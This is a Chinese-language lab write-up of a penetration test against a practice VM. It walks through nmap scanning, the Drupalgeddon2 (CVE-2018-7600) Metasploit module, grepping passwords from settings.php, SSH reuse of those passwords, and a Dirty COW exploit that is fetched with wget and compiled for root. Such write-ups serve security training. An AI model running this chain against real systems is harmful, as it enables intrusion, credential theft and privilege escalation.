声明
好好学习,天天向上
搭建
使用virtualbox打开,网络和我的PRESIDENTIAL一样,是要vmware和virtualbox互连
渗透
存活扫描,发现目标
arp-scan -l
nmap -sP 192.168.239.1/24
端口扫描
nmap -T4 -A 192.168.239.12 -p 1-65535 -oN nmap.A
开启端口
发现开启80,22,1898
访问80
http://192.168.239.12
80开了个寂寞
dirscan连接还有问题
看看1898的drupal吧
http://192.168.239.12:1898
dirscan扫描目录
python3 dirsearch.py -u 192.168.239.12:1898
看看robots里面有啥吧
看到cms的版本更新到Drupal 7.54了
利用漏洞
Drupal核心远程代码执行漏洞CVE-2018-7600
使用msf
msfconsole
search CVE-2018-7600
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.239.12
set RPORT 1898
show options
run
进入
shell
查看都有哪些用户以及数据库密码
ls /home
cat /var/www/html/sites/default/settings.php | grep password
得到了一个用户tango和两个密码
password
Virgulino
尝试登录
ssh tango@192.168.239.12
Virgulino
使用脏牛提权
命令:
searchsploit dirty
查找脏牛提权shell,利用40847.cpp
使用CP进行复制到本地
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ./
思路是继续开启本地pthon服务,然后把40847.cp发送到靶机上。
python -m SimpleHTTPServer 5555
靶机执行
wget http://192.168.239.13:5555/40847.cpp
执行
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o dcow gcc生成的目标文件,名字为dcow
执行gcc编译可执行文件,可直接提权。
执行完后生成脚本,执行脚本
./40847 -s
总结
1.信息收集
端口发现80、22、1898
通过80,看了个寂寞
通过1898,发现了drupal的信息,查看敏感目录,发现了版本
2.web权限
无
3.shell权限
通过drupal的CVE漏洞拿到shell,并查看到了配置文件
4.权限维持
利用配置文件进行ssh登录
5.提权
脏牛提权,开启站点,生成脚本,编译执行拿到root和flag